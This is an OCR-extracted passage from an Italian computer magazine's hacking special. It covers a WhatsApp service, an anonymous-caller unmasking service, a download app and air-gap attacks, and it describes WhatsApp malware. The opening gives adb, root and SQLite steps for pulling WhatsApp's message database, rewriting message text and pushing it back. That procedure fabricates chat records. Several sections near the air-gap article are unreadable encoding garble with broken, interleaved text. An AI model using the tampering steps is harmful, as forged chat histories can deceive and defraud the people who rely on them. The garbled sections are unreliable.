Sempre nella shell digitiamo cp /data/data/


com.whatsapp/databases/msgstore.db /
sdcard/ e premiamo Invio. Usciamo da adb digitando
due volte exit e premendo Invio. Quindi scriviamo adb
pull /sdcard/msgstore.db, in questo modo il database
verr salvato nella cartella C:\adb\ del PC.

Entriamo nella cartella WhatsKit\SQLiteStudio


estratta in precedenza e avviamo SQLiteStudio.exe. Dal menu in alto scegliamo Database/Add
database. Clicchiamo sullicona + ed esploriamo le
cartelle del PC ino a raggiungere il ile msgstore.db
che si trova in C:\adb. Clicchiamo OK.

La chat stata modiicata!

Clicchiamo sullicona rafigurante una spunta verde (Commit) per salvare le modiiche
apportate. Dal menu Database eseguiamo la disconnessione cliccando sulla voce Disconnect from database, quindi chiudiamo il software SQLiteStudio e torniamo alla nostra shell dei comandi Android.
82 Win Magazine Speciali

Diventiamo super utenti!

Digitiamo il comando adb shell e premiamo


Invio. Controlliamo sul display dello smartphone e autorizziamo il computer alla comunicazione
cliccando su Autorizza. Per accedere al dispositivo in
modalit Super User, digitiamo nella shell il comando
su e conferiamo con Invio.

Troviamo i messaggi

Clicchiamo Database/Connect the database e scorriamo lelenco cliccando messagges. Dal tab DATA digitiamo il testo da modiicare nel
campo ilter data. Prendiamo nota dellID messaggio,
clicchiamo due volte sul testo e modiichiamolo semplicemente sostituendolo col nuovo testo.

Rimettiamo le cose a posto

Riavviamo lo smartphone afinch tutte le app


siano effettivamente chiuse. Dal PC digitiamo in sequenza i comandi adb push msgstore.db /
sdcard/, poi adb shell, quindi digitiamo su ed inine
cp /sdcard/msgstore.db /data/data/com.whatsapp/
databases, confermando ogni volta con Invio.

Veriichiamo le modiiche

Chiudiamo il prompt dei comandi digitando exit


e premendo Invio. Scolleghiamo il telefono dal
PC e avviamo Whatsapp. Scorriamo le conversazioni presenti e apriamo quella contenente i messaggi
modiicati. Se lapp rileva unanomalia sul database,
ripetiamo la procedura appena vista.

PROGRAMMARE NON MAI


STATO COS SEMPLICE

I
N
O
I
S
R
E
2V
D

+C
a
t
s
i
v
i
R

+ libro
D
C
+
a
t
Rivis

IN EDICOLA

Cos fa lhacker

| Fai da te | Cos ti sgamo il numero nascosto |

C un modo se reto per scoprire lidentit e il numero


di chi ti telefona con lanonimo. Ecco come fare

Cosa ci
occorre

10 MIN.
FACILE

SERVIZIO ANTI STALKER

Cos ti sgamo il
numero nascosto
T

empi duri per gli stalker e per quei buontemponi che


amano fare scherzi al telefono: grazie ad un nuovo
servizio disponibile in Italia sar possibile per chiunque scoprire lidentit di chi chiama con numero anonimo.
Fino a qualche anno fa per ottenere dati sensibili di questa
natura bisognava presentare una denuncia presso lautorit competente, produrre prove legate allo stalkeraggio
(come registrazioni delle conversazioni e quantaltro) e rinunciare a conoscere lidentit del molestatore sperando
che lammonizione del carabiniere potesse farlo desistere
dal provarci ancora.

La soluzione allo stalking


Negli Stati Uniti, gi da alcuni anni, esiste una tecnologia
chiamata TrapCall che permette agli utenti registrati al servizio di scoprire il numero del chiamante anonimo mediante

un reindirizzamento di chiamata. C da fare una precisazione: il suddetto servizio non funziona qualora il molestatore decida di utilizzare cabine telefoniche o servizi VoIP come Skype. Di recente anche in Italia disponibile un servizio analogo, legalmente autorizzato e offerto dalla societ
Whooming (www.whooming.com), che promette e realizza i desideri di chi stanco delle chiamate anonime. Per dare la possibilit ai nostri lettori di testare il servizio, abbiamo stretto un accordo con Whooming riuscendo ad ottenere uno speciale coupon per usare il servizio fino al 20 dicembre 2015 senza limitazioni temporali: potremo immediatamente scoprire chi ci chiama col numero anonimo!
Ogni volta che riceveremo una telefonata da una numerazione sconosciuta potremmo vedere in chiaro il numero accedendo al nostro account Whooming o dal cellulare usando lapposita app. Vediamo come smascherare gli anonimi.

WHOOMING
Quanto costa: Gratuito
ino al 20 dicembre
2015 solo per i lettori
di Win Magazine
Sito Internet:
www.whooming.com

BUONI
CONSIGLI
RICARICARE
IL CREDITO
WHOOMING
Clicchiamo sul pulsante
Ricarica dalla pagina
principale del sito di
Whooming e scegliamo
il taglio da 5, 10 o 25
euro. Per il pagamento
possiamo usare carta di
credito o conto PayPal.
La ricarica permette
di usare tutti i sevizi
aggiuntivi, come la
registrazione della chiamata o il servizio Parla
con lo stalker.

Registriamoci al servizio e atti


Per riscuotere il coupon riservato in esclusiva ai lettori di Win Magazine dobbiamo accedere al sito di Whooming

Ecco la password di accesso

Raggiungiamo il sito www.whooming.com e


clicchiamo sul pulsante Registrati al centro
pagina. Nella schermata successiva inseriamo un
indirizzo e-mail valido (su tale casella di posta elettronica riceveremo la password di accesso al servizio) e clicchiamo di nuovo sul pulsante Registrati.

84 Win Magazine Speciali

Il nostro gestore telefonico

Ricevuto il codice, effettuiamo il login al


servizio con Accedi. Clicchiamo Aggiungi
Numero e specifichiamo la Nazione di appartenenza, lOperatore e il nostro Numero telefonico.
Spuntiamo Accetto i termini e clicchiamo su
Continua.

Digitiamo il codice magico

Nella schermata successiva scegliamo lopzione Deviazione su Occupato. Usando il


tastierino del telefono digitiamo sullo smartphone il
codice **67*0694802015# e tappiamo sulla cornetta verde per eseguire il comando: un messaggio
ci confermer lavvenuta attivazione del servizio.

| Cos ti sgamo il numero nascosto | Fai da te |

Cos fa lhacker

GLI STRUMENTI GIUSTI PER SMASCHERARE GLI SCOCCIATORI


Impariamo ad usare al meglio linterfaccia di Whooming per mettere in chiaro i numeri di telefono anonimi.
CONFIGURAZIONE
Contiene tutti gli strumenti utili per dare ilo da
torcere a chi, un momento prima, si sentiva al
sicuro dietro il proprio anonimato
ELENCO
In questa sezione possiamo consultare lo storico
delle chiamate ricevute con numero nascosto.
Se abbiamo associato pi dispositivi al servizio,
dobbiamo scegliere il numero da controllare
RICEVI SMS
Lopzione ha un costo di 20 centesimi (che
vengono scalati dal conto Whooming) per ogni
messaggio che riveli il numero del disturbatore
PARLA CON LO STALKER
Permette di mettersi in contatto con lo
scocciatore. Lopzione ha un costo di 20 centesimi
per ogni minuto che passeremo al telefono con lui
REGISTRA LA CHIAMATA
CON LO STALKER
Funziona solo se attiva lopzione Parla con lo
stalker. Il ile audio della registrazione, in formato
MP3, potr essere scaricato dalla sezione Elenco
chiamate. Lopzione ha un costo di 10 centesimi
RICEVI SMS ANCHE PER CHIAMATE
NON ANONIME
Lopzione permette di ricevere un SMS da
Whooming anche nei casi in cui il Chiamante non
sia arrivato con un numero anonimo.
RICEVI SMS E CHIAMATE SU
UN NUMERO ALTERNATIVO
possibile speciicare un altro numero di telefono
cui indirizzare tutti gli SMS. Attivare lopzione
non ha nessun costo se non quello legato alla
ricezione dellSMS che verr comunque scalato
dal credito Whooming.

viamo la promozione
ed effettuare una semplice registrazione gratuita entro il 20 dicembre 2015. Ecco i passi da seguire.

Testiamo il servizio

Da un secondo telefono (possiamo usare


anche lapparecchio di casa) componiamo
il numero del cellulare appena configurato. Non
ci interessa nascondere il numero: stiamo solo
facendo una prova. Rifiutiamo la chiamata in
modo da inoltrarla ai server di Whooming per
essere processata.

Cellulare pronto alluso

A questo punto il nostro numero di cellulare stato configurato correttamente.


Possiamo effettuare la verifica dal sito di Whooming tramite il pulsante Conigurazione. Da
Componenti aggiuntivi (a sinistra) possibile
gestire i servizi extra da associare al numero (o
ai numeri) registrati.

Attiviamo la promo

Non rimane che attivare la promozione


esclusiva che Whooming entro il 20 dicembre 2015. Clicchiamo sul pulsante Ricarica
in alto a sinistra e digitiamo il codice WHOOMING2015WM nel campo Hai un codice promo.
Confermiamo cliccando sul pulsante accanto a
forma di freccia.

Speciali Win Magazine 85

Cos fa lhacker

Mai pi telefonate anonime

BUONI
CONSIGLI
WHOOMING SU
CELLULARE
Il servizio Whooming
pu essere attivato
anche su smartphone
Android, iOS e Windows
Phone. Installando
tale applicazione, sar
possibile accedere al
pannello di controllo
e veriicare lelenco
chiamate, aggiungere
un numero telefonico,
attivare/disattivare
funzioni extra del servizio e altro ancora.

| Fai da te | Cos ti sgamo il numero nascosto |

Il nostro telefono cellulare pronto per scoprire lidentit di chi ci telefona nascondendosi dietro
un numero anonimo. Ecco come sfruttare al meglio gli strumenti offerti dal servizio Whooming.

DISATTIVARE
LA DEVIAZIONE
DI CHIAMATA
Nel caso in cui desideriamo disattivare anche
temporaneamente il
servizio di deviazione
delle chiamate sar necessario digitare sul telefono il codice ##002#
e tappare sulla cornetta
verde. Verr comunicato il buon esito delloperazione. Per riattivare
il servizio dovremmo
nuovamente digitare
il codice di deviazione,
**67*0694802015# per
tutti gli operatori ad
eccezione di Tre per il
quale bisogna digitare
**67*0694802015*11#.
Non sar necessario
confermare nuovamente il numero di telefono.

Il codice per telefonate anonime

Per testare lefficienza del servizio, effettuiamo una


chiamata anonima al nostro cellulare. Se telefoniamo
da un dispositivo mobile dobbiamo usare il codice #31#numerotelefono per anonimizzarci; nel caso di un apparecchio di
rete fissa usiamo il codice *67#numerotelefono. Nel momento
in cui il nostro cellulare inizia a squillare, rifiutiamo la chiamata.

Ecco svelato il numero nascosto

Accediamo al nostro account su www.whooming.com


e spostiamoci nella sezione Elenco chiamate. In basso
verr visualizzato in chiaro il numero telefonico della persona
che ci ha disturbato usando un numero anonimo. possibile
controllare lo storico delle chiamate ricevute anche dal cellulare
Android, installando lapp di Whooming dal Play Store di Google.

IN QUANTO TEMPO VIENE SMASCHERATO IL DISTURBATORE?


TEMPO DI TRASPORTO INTERCONTINENTALE DELLA TELEFONATA

0,085 secondi +

TEMPO DI LATENZA INTRODOTTO DAI SISTEMI TELEFONICI

0,090 secondi +

TEMPO TECNICO DI SWITCHING ALLINTERNO DEI SERVER (TRUNK)

0,002 secondi =

TEMPO TOTALE

0,18 secondi

Utilizzando il servizio Whooming, bastano poco meno di 2 decimi di secondo per smascherare lo stalker!

COME FUNZIONA IL SERVIZIO OFFERTO DA WHOOMING?


Lo abbiamo chiesto direttamente al team di Whooming. Ecco cosa ci hanno risposto.
Whooming funziona grazie ad una batteria di server
collegati su diversi Trunk SS7, una sorta di centro
di smistamento digitale per le telefonate. I Trunk
sono conigurati in base alla Nazione da servire ed
in base al carico generato dagli utenti di ogni Paese.
Se lutente iscritto a Whooming ed ha conigurato
correttamente il proprio telefono, nel momento in
cui esso riceve una chiamata anonima di disturbo
e riiuta la chiamata, fa innescare sul suo gestore
la deviazione su occupato. In questo modo il gestore dellutente indirizza la chiamata che aveva
spedito allutente verso il centro di smistamento

86 Win Magazine Speciali

(Trunk SS7) corrispondente al numero geograico


selezionato dallutente per la deviazione su occupato (numero di Whooming in questo caso). A sua
volta i server di Whooming ricevono la segnalazione
di una chiamata anonima e prendono in carico il
numero da smascherare. Veriicano le opzioni attivate dallutente e, in mancanza di altre istruzioni, si
limitano a smascherare il chiamante disturbatore
e a terminare immediatamente la chiamata. Tutte
queste operazioni sono invisibili al disturbatore
che otterr il solo tono di occupato senza alcun
addebito in bolletta.

Cosa succede se viene attivata la funzione Parla


con lo stalker?
Il server di Whooming che ha ricevuto la chiamata
avvia immediatamente una telefonata parallela, su
un nuovo Trunk SS7 verso lutente che dovr ricevere la chiamata. Il chiamante continua a sentire il telefono chesquilla liberoe non appena Whooming
riesce a chiamare efettivamente lutente cercato,
mette i due in comunicazione in modo trasparente
per il chiamante. Ma qui in realt successa gi la
magia, lutente chiamato sta parlando con lo stalker conoscendone gi il reale numero di telefono.

Cos fa lhacker

| Scarica a mille col cellulare | Fai da te |

Ti re aliamo l app per estire al me lio i download con


lo smartphone Android anche dalle reti Peer to Peer

lultimo episodio della nostra serie TV


preferita o, ancor peggio, quando unattivit ci fa andare in blocco il sistema costringendoci a riavviare.

Il download mobile
In ambiente PC i download manager si
sprecano: uno dei pi popolari sicuramente JDownloader che, oltre a gestire
i download da browser, supporta anche
i file torrent e i servizi di file hosting come Rapidshare. Ma ve ne sono per tutti i
gusti e le maniere, come Wget, popolare in ambiente Linux, e Free Download

10 MIN.
FACILE

APP ANDROID

Scarica a mille
col cellulare
l giorno doggi impensabile riuscire a scaricare file da Internet
senza ricorrere ad un download
manager, ovverosia un programma creato apposta per il download dalla Rete.
Chi non ha dimestichezza con applicazioni Peer to Peer come eMule o Torrent
(e affini) sa bene quanto pu essere frustrante arrivare al 95% di un download
col browser ed essere fulminati dal messaggio il server ha interrotto la connessione. Per non parlare di quando erroneamente chiudiamo Chrome o Explorer
dimenticando che stavamo scaricando

Cosa ci
occorre

POWER
DOWNLOADS
SOFTWARE COMPLETO
Sito Internet:
www.winmagazine.
it/link/3204

Manager, anche questultimo con supporto ai file torrent. Effettivamente si


sentiva il bisogno di un programma del
genere anche in un mondo relativamente nuovo ai download come quello degli
smartphone e dei tablet. E non c dubbio che larrivo di connettivit sempre pi
spinte come il 4G abbia portato anche tra
i dispositivi mobile lesigenza di un software dedicato alla gestione dei download. La soluzione che abbiamo scovato
si chiama PowerDownloads, unapp magica che permette di cercare e scaricare
qualsiasi file direttamente dal cellulare.

Attiviamo la promozione
Scopriamo come installare PowerDownloads in tre passi e come applicare la promo riservata ai lettori di Win
Magazine per eliminare completamente i banner pubblicitari che compaiono nella sua interfaccia principale.

Una semplice installazione

Avviamo il Play Store di Google, troviamo


lapp PowerDownloads e installiamola. Al
primo avvio lapplicazione ci guider in un veloce
tutorial guidato per apprenderne le principali funzionalit. Tappiamo sul pulsante Prossimo in quando il
wizard non verr completato.

Togliamo la pubblicit

Raggiungiamo il menu principale toccando


licona a sinistra e tappiamo su Promozioni.
Nella casella Inserisci il tuo codice digitiamo il coupon winmagazine e tappiamo poi sul pulsante Veriica. La successiva conferma eliminer dallapp tutti
i banner per un intero mese.

Quali reti vogliamo utilizzare

Tappiamo quindi sulla voce Rete dal menu


Impostazioni, raggiungibile con un tocco
sullicona in alto a sinistra. Qui facciamo attenzione a togliere la spunta su Usa connessioni mobili
2G/3G/4G nel caso in cui non desideriamo utilizzare
la rete mobile per il download.

Speciali Win Magazine 87

Cos fa lhacker

| Fai da te | Scarica a mille col cellulare |

Il browser per i download


Scopriamo come sfruttare le funzioni di navigazione Web di PowerDownloads per cercare in Rete i contenuti da
scaricare. Grazie alla semplice interfaccia utente pensata per lo scopo sar davvero un gioco da ragazzi.

Un tool specializzato

Nel menu principale tappiamo sulla voce


Power Browser e nella barra degli indirizzi
digitiamo il nome del sito desiderato facendoci aiutare dalla funzione di autocompletamento. Completata
la digitazione, tappiamo sulla freccia accanto per raggiungere il sito in questione.

I nostri segnalibri

Per raggiungere facilmente lindirizzo le


prossime volte tappiamo sullicona di menu
del browser in alto a destra e selezioniamo la voce
Aggiungi segnalibro. Confermiamo la inestra successiva modiicando i dati dove necessario e tappando
inine sul pulsante OK.

Gestiamo i download

Se vogliamo cancellare un download in corso


non dobbiamo fare altro che tenere premuta
per qualche secondo la relativa scheda e poi tappare sullicona del cestino. Accedendo invece al menu
principale dellapp mediante licona con i tre puntini
potremo metterlo in pausa o riavviarlo.

Scarichiamo il nostro ile

Individuiamo il collegamento al ile interessato e tappiamoci sopra. Si aprir una inestra


dal titolo Nuovo download. Qui possiamo veriicare la
tipologia del ile che ci interessa e le sue dimensioni.
Quindi possiamo iniziarne il download tappando sul
pulsante Scarica.

Download anche in manuale

Premesso di conoscere il percorso del nostro


contenuto, possiamo scaricare il ile selezionando dal menu principale la voce In coda e tappando poi sul pulsante + in basso a destra. Nella inestra
successiva scriviamo lindirizzo del contenuto e tappiamo sul pulsante Apri.

Riproduzione in tempo reale

Selezioniamo un collegamento che contenga


un ile video. Nella inestra di download sar
presente una nuova voce: Streaming. Tappiamoci
sopra. Lapplicazione ci chieder di scegliere il player
per riprodurlo: optiamo per quello predeinito PowerDownloads Player.

PRIMA SCARICHI... E POI MANDI IN STREAMING!


Lapp PowerDownloads permette di via Internet sul televisore di casa i completamento. Innanzitutto, se
interfacciarsi anche con la Google contenuti multimediali che stiamo non labbiamo ancora fatto, inseChromecast per riprodurre in diretta scaricando, persino prima del loro riamo la Chromecast nella porta
HDMI del televisore e selezioniamo il canale HDMI corrispondente. Se la chiavetta correttamente
conigurata dovrebbe collegarsi in
automatico alla rete Wi-Fi di casa.
Raggiungiamo quindi un contenuto
video sul PowerBrowser come visto
nella guida precedente. Tappiamo
sul link, selezioniamo Streaming e
09 PowerDownloads. Licona della
Chromecast in alto a destra del riproduttore ci permetter di deviare
88 Win Magazine Speciali

il video sul pennino di Google. In


pochi secondi il video verr riprodotto sul televisore oscurando la
inestra di riproduzione di PowerDownloads. A questo punto possiamo controllare la riproduzione
della Chromecast direttamente col
telecomando del televisore.

| Attacco AirHopper | Per saperne di pi |

Cos fa lhacker

Il cellulare spia
qualsiasi PC
C chi sbircia nei nostri dati
intercettando le onde radio del
monitor. Svelati i retroscena

computer pi protetti del mondo sono collocati in sistemi air gap. Pi che di sistemi, parliamo di una serie di rigide regole che indicano,
per esempio, che un computer di questo tipo non
deve essere collegato a un altro computer o a una
rete (men che meno se si tratta di Internet). E che,
tra un computer di questo tipo e il successivo, ci
deve essere una certa distanza, che determina,
appunto lair gap. Esagerato? Per il nostro computer s, ma se parliamo di quelli che gestiscono
centrali nucleari, o postazioni lancia-missili,
chiaro che la sicurezza non mai troppa. E per
sicurezza, intendiamo lessere isolati e protetti
da manomissioni hacker e malware.

Sicuri, ma non troppo


Nel corso degli anni, tuttavia, vari ricercatori
hanno sperimentato tecniche pi o meno esotiche per scardinare i sistemi air gap, anche se
nessuno si spinto in l come il ricercatore di
sicurezza Mordechai Guri e il professor Yuval
Elovici, della Ben-Gurion University di Israele.
I due, infatti, hanno sviluppato un raffinato
metodo per rubare i dati da un computer air gap
sfruttando un comune smartphone, in tutto e
per tutto simile a quello che ogni giorno portiamo nelle nostre tasche e nelle borse delle
signore. Non solo: visto che i sistemi air gap prevedono che si debba depositare lo smartphone
allingresso della stanza che contiene i preziosi
computer, i due ricercatori hanno fatto in modo
che il loro sistema, chiamato AirHopper, tenesse
conto di questa limitazione. E funziona, caspita
se funziona. Il punto : come?

Onda su onda
Prima di spiegarlo, facciamo un passo indietro.
Da ormai parecchi anni si sa che i monitor dei
nostri computer (ma anche i televisori di casa
e, pi in generale, tutti i display dei dispositivi
hi-tech), chi pi chi meno, emettono onde radio.
Senza scendere in pesanti tecnicismi, prendiaSpeciali Win Magazine 89

Cos fa lhacker
mo per assodato questo fatto e teniamone conto.
Ora pensiamo al nostro smartphone: tra le tante
funzioni presenti, quasi di sicuro c anche
quella di Radio FM. Che, di fatto, trasforma
il dispositivo in un ricevitore di onde radio. Il
che, tradotto, significa che uno smartphone
potrebbe ricevere le onde radio scaturite da un
monitor. Ora, dato che queste onde variano in
base a ci che viene visualizzato dallutente,
dotando lo smartphone di unapposita applicazione in grado di decodificarle, possibile
risalire al contenuto mostrato dal computer.
Capito quanto sono stati furbi questi due ricercatori? Utilizzano lo smartphone per ricevere
e decodificare le onde radio provenienti dal
monitor collegato al computer air gap! Il fatto,
poi, che un PC di questo tipo sia, per definizione,
collegato a un proprio monitor, rende il metodo
di Guri ed Elovici ancora pi efficace. Rimane
un dubbio: ma non avevamo detto che gli smartphone vanno depositati allingresso di una
stanza con sistemi air gap? Nessun problema:
il metodo sviluppato dai due geniacci israeliani
funziona fino a una distanza massima di circa
sette metri, con prestazioni tra i 13 e 60 byte al
secondo (quanto basta per rubare informazioni
sensibili). Considerato che i sistemi air gap, di
solito, sono relegati in stanze piuttosto piccole,
quello di Guri ed Elovici un metodo che mette
in seria discussione la sicurezza degli air gap.
E, quindi, di centrali nucleari, sistemi militari
e via dicendo. Uno scenario da brividi, vero?

| Per saperne di pi | Attacco AirHopper |

COS E COME FUNZIONA IL SISTEMA


DI
PROTEZIONE AIR GAP
Tecnicamente, un air gap, o air wall, un sistema vano e comunicano le variazioni di temperatura.
che isola un computer, o una rete, da un sistema
informatico potenzialmente vulnerabile, e quindi
collegato a Internet. A volte, questa soluzione cos
estrema va incontro a qualche compromesso. Per
esempio, la trasmissione dei dati pu avvenire dal
sistema air gap allesterno, ma non il contrario,
sfruttando una protezione crittograica di alto
livello. Per via dellelevata sicurezza, i sistemi air
gap sono utilizzati non solo per scopi militari,
ma anche in ambito finanziario e industriale.
Per esempio, nei sistemi SCADA. Dove, tuttavia,
stata dimostrata una grave vulnerabilit col
ben noto malware Stuxnet. Oltre che
he sfruttando
le onde radio come visto in questo articolo, i
sistemi di protezione basati su tecniche di air
gap possono essere bucati anche sfruttando
il calore. A dimostrarlo sono stati ancora
una volta i due ricercatori israeliani Guri
G
ed Elovici, che hanno chiamato BitWh
hiue
sper questa tecnica. In pratica, i du
sono partiti dal presupposto che un
computer durante il suo funzionameento
ore
genera una quantit variabile di calo
oco
a seconda che si utilizzi un videogio
o un programma di videoscrittura come
Word. Tuttavia, per evitare che ci siano
dotato
dei picchi pericolosi, il computer d
di una serie di sensori che, in ogni istaante, rile-

Ora, mettiamo che queste variazioni diventino


la base di un sistema di comunicazione, stile
Codice Morse: cambiando la temperatura di un
computer, sarebbe possibile inviare dei messaggi
o, addirittura, dei comandi. BitWhisper si basa su
questo concetto: un malware infetta un computer
A e uno B. Il computer A, quindi, sotto controllo
del malware, cambia temperatura. Se il computer B si trova a una distanza inferiore ai 40 cm,
risentir di queste variazioni di calore, variando
di conseguenza la propria temperatura. Il malware presente nel computer B, quindi, riconosce
questi cambiamenti
e li interpreta come
comandi veri
e propri.

COS AVVIENE UN FURTO A ONDE RADIO

Ecco, in pratica, come il sistema AirHopper riesce a sgraignare dati a un computer protetto mediante un sistema basato
sulla tecnica dellair gap, sfruttando un semplice smartphone dotato di unapposita app di decodiica.


WH
U
D
L S RV
6 F

CO
$GPEJoNC FKUVCP\C QRGTCVKXOQPKVQTUKCPQXKEKPK3WGUVQRGT
pOGINKQEJGUOCTVRJQPGG KVTCUHGTKOGPVQQRUHWTVQFGK
CNVTQOKINKQTCNCXGNQEKViF QFGNNQDCUCVQUW#PFTQKF
FCVK.QUOCTVRJQPGpWPO
90 Win Magazine

WL
V
WH H
, P
D

.CVGEPKECHWP\KQPCEQOGGCXGUFTQRRKPIEKQpRGTKPVGTEGVVCTG
FCVKEJGXGPIQPQXKUWCNK\\CVKUWNNQUEJGTOQ0KGPVGUEQTTKDCPFG
UWNFKUEQHKUUQOCSWCPVQDCUVCRGTGUGORKQRGTKPVGTEGVVCTG
EKyEJGXKGPGUETKVVQEQPWPRTQITCOOCFKGNCDQTC\KQPGVGUVK

| Attacco AirHopper | Per saperne di pi |

Cos fa lhacker

CHI C DIETRO
AIRHOPPER

$LUJDS
IDLGDWH
('(<A(
(55(
==FN
%(%
N((A
NAF

N 5
%


NAN(
NO
 A(<<N5N
(<(5 A'N(P
.OA A
N< A N'N(=

F(A55 A(T
,55(
NFA=
N55(55PM<AN
(  55N(ANA5(<N('NP

Yuval Elovici il professore della Ben-Gurion


University che ha avviato la ricerca sulle tecniche
di violazione dei sistemi di sicurezza air gap.

!O N55(AA(5<ANN((5P N(F

NAA(( A'N5N5F
( A<(
NF

(
 N
(
%(
(%((NANPN(F
NP

Dietro a questa grossa ricerca che ha portato alla


scoperta di un metodo di attacco dei sistemi di
sicurezza basati sulla tecnica dellair gap c, come detto, lo zampino del professor Yuval Elovici,
uno che di sicurezza informatica ne sa a pacchi.
Laureatosi alla Ben-Gurion University in ingegneria elettrica e informatica, nel 1989, Elovici
ha dedicato la carriera professionale a studiare
i sistemi di protezione di apparati elettronici.
Attualmente, nella medesima universit, riveste
il ruolo di direttore d ei Deutsche-Telekom Laboratories. Tra i suoi lavori pi celebri, un sistema
che limita laccesso a documenti trafugati, sfruttando il sistema di identiicazione dei malware.
E poi, diversi studi nel campo dellintelligenza
artiiciale, per approdare, proprio questanno,
al mondo dei computer air gap, facendo da
chioccia al suo studente Mordechai Guri.

&ON(N'(
N55(55F (5(== A
(</ LFN(
(=(NA
N<$ P

S D
S
D OLF
Q
8 ER
D
GL

5COUWPI )CNCZ
.QUOCTVRJQPGWPEQOWPGQRRGT+PDWQPCUQUVCP\CWPCRR
EWHHKGGFGNNCRRFK#KT* FKQPFGRTQXGPKGPVKFCNNQUEJGTOQG
EJGHWP\KQPCFCTKEGXKVQTG TGPFGTNGHTWKDKNKFCNVGNGHQPQ
EQPNCECRCEKViFKVTCFWTNGG

*O((5( ((N<<(
T
=(NA N<(
P
"O+(5(==N
%((5 ((5(PL(
'(
N< (A(( (5(==AN
 (
5 ('<A(5(N<N5N
<5(
(F
N<($ E$P
4O (5(==(<<N(AF((A<NN
%
(ANA N'(=

P# ( 55N


N'o
 5<AnP
9O (
( F/5 T655<<N(
A(((5 N

N< P
;O N((
 (((5
%(
((5
 N
N< P

SR
P
H H
 W DO
Q
, UH

7PCXQNVCEJGNCRRpKPGUGEW\KQPGOQUVTGTiSWCNUKCUKOGUUCI
IKQXKUWCNK\\CVQUWNOQPKVQTFGN2%KPCKTICR3WCUKKPVGORQ
TGCNGGUGP\CCNEWPVKRQFKEQPPGUUKQPG9K(K#KT*QRRGTp
FCXXGTQWPUKUVGOCTCHHKPCVQGFKCDQNKEQ
Speciali Win Magazine 91

Cos fa lhacker

| Fai da te | Cos ti spio WhatsApp! |

Cos ti spio
WhatsApp!

ATTENZIONE

Ricordiamo che violare le to


reti e gli account altrui unlarealegge
perseguibile penalmente dal
ice penale).
italiana (art. 615-ter del codte,
pertanto,
crit
des
Le procedure da noi
ivamente
lus
esc
ate
lizz
devono essere uti
essere
o
son
pos
e
tivo
stra
a titolo illu
no
messe in pratica solo sui stri
dispositivi o su quelli di amici
informati di quanto stiamo
facendo.

prendere possesso degli account altrui e leggerne


tutti i messaggi. Eccoti svelate tutte le nuove tecniche

na delle leggi non scritte dellinformatica prevede che pi una


certa tecnologia ottiene favore
di pubblico, maggiore la probabilit
che qualche malintenzionato cerchi di
utilizzarla per far circolare malware
di vario tipo (virus, worm, trojan e via
dicendo). WhatsApp una delle applicazioni di messaggistica istantanea pi
utilizzate dagli utenti di smartphone e
tablet, quindi era abbastanza scontato
che i pirati informatici cominciassero
a prenderla di mira.

Non la prima volta


In realt, sta gi succedendo da qual-

che tempo: oltre due anni fa era comparso il malware Priyanka. Si trattava
di un semplice worm che si presentava
ad un utente sotto forma di nuovo
contatto: appena il malcapitato accettava di inserire Priyanka nella propria
rubrica, il worm cancellava tutti i contatti della rubrica sostituendoli con se
stesso. Non provocava, dunque, veri e
propri danni economici o lesioni della
privacy, ma era certamente fastidioso.
Priyanka, per, ha aperto la strada
a qualcosa di molto pi pericoloso:
sulla sua stessa falsa riga, infatti,
stato recentemente scoperto un altro
malware il quale, tuttavia, presenta

un rischio non indifferente per la privacy degli utenti. Priyanka, infatti, si


basava sullaccettazione di una vCard,
ovvero un biglietto da visita elettronico. Il malware si presentava alle
sue vittime con il proprio biglietto da
visita e quando queste lo accettavano
cominciava a modificare la rubrica
di WhatsApp. Era una sorta di proof
of concept, cio un test sul funzionamento di un malware: avrebbe potuto provocare enormi danni, ma non
lo faceva. In un certo senso, serviva
soltanto a dimostrare la fattibilit di
questo tipo di attacco nei confronti
di WhatsApp.

CRONISTORIA ILLUSTRATA DI UN ATTACCO AL NOSTRO ACCOUNT SU

Il pirata prepara un programma eseguibile (per esempio il classico EXE oppure uno script BAT per Windows) e lo traduce non in codice binario ma in codice base64.
92 Win Magazine Speciali

Il pirata sceglie un numero telefonico da prendere


di mira (ogni account WhatsApp associato ad un
numero). Naturalmente, pu tirare a caso con un
generatore casuale di numeri telefonici.

Lutente vittima viene contattato dal pirata, che gli


propone una biglietto da visita elettronico in formato
vCard (che poi un semplice testo scritto in un particolare linguaggio) per presentarsi.

Cos fa lhacker

| Cos ti spio WhatsApp! | Fai da te |

Il pericolo adesso reale


Negli ultimi tempi, invece, si sta diffondendo
un malware ben pi pericoloso, in quanto si
tratta di uno spyware vero e proprio e non
pi un worm: non si limita quindi ad essere fastidioso, ma piuttosto ruba fotografie e
informazioni personali. Questo spyware si
diffonde anchesso mediante finti biglietti
da visita in formato vCard ed stato appositamente progettato per la versione Web di
WhatsApp: basta accettare il biglietto da visita
malevolo per essere infettati. Una volta che
il nostro account viene compromesso dallo
spyware, il programma pu leggere le nostre
conversazioni e prelevare le nostre fotografie
o i video. E gli autori dello spyware possono
avere accesso a tutti questi dati, facendone
ci che vogliono: anche caricare le nostre foto
private sul Web. E non detto che ci avvenga
subito: il pirata, infatti, potrebbe decidere
di pubblicarli anche tra qualche tempo e,
quando meno ce lo aspettiamo, potremmo
ritrovare le nostre immagini su siti a dir poco
inattendibili.

Attenti al falso messaggio


Ma stato scoperto anche un altro malware
che colpisce gli utenti WhatsApp (questa
volta nella versione app per smartphone),
utilizzando un metodo tanto comune sulle
varie chat da essere quasi banale: un falso
messaggio. Gli utenti vittime si sono visti
arrivare un messaggio che indicava la presenza di un messaggio vocale registrato nella

segreteria, corredato da un pulsante con


la scritta Ascolta il messaggio. E, ovviamente, appena gli utenti cliccano su quel
pulsante vengono indirizzati ad una pagina Web ricca di malware di vario genere. Il
principio di funzionamento pi o meno lo
stesso di quelle e-mail che contengono un
link per ottenere una pillola miracolosa che
fa dimagrire in dieci minuti mangiando un
cinghiale arrosto, ma poi ci reindirizzano al
download di uno spyware (magari il classico
file importante.pdf.exe).

Impariamo a difenderci
Per evitare questi malware sufficiente non

accettare i biglietti da visita digitali di persone


che non conosciamo e non cliccare su alcun
pulsante di segreteria, visto che WhatsApp
non ha una segreteria telefonica. Sono due
semplice norme di buon senso, che tuttavia
molti utenti non seguono: sono infatti milioni
(una stima parla di 200 milioni) gli utenti caduti
vittima di questi malware. Il problema che
per quanto sicuro possa essere un programma
di per se stesso, avr sempre un punto debole:
lutente, che capace di fare qualcosa di sciocco
e vanificare tutti gli sforzi dei programmatori
per migliorare la sicurezza. In questo senso, il
racconto del pirata pu aiutarci ad evitare di
cadere nelle sue stesse trappole!

TUTTI I PERICOLI DI WHATSAPP


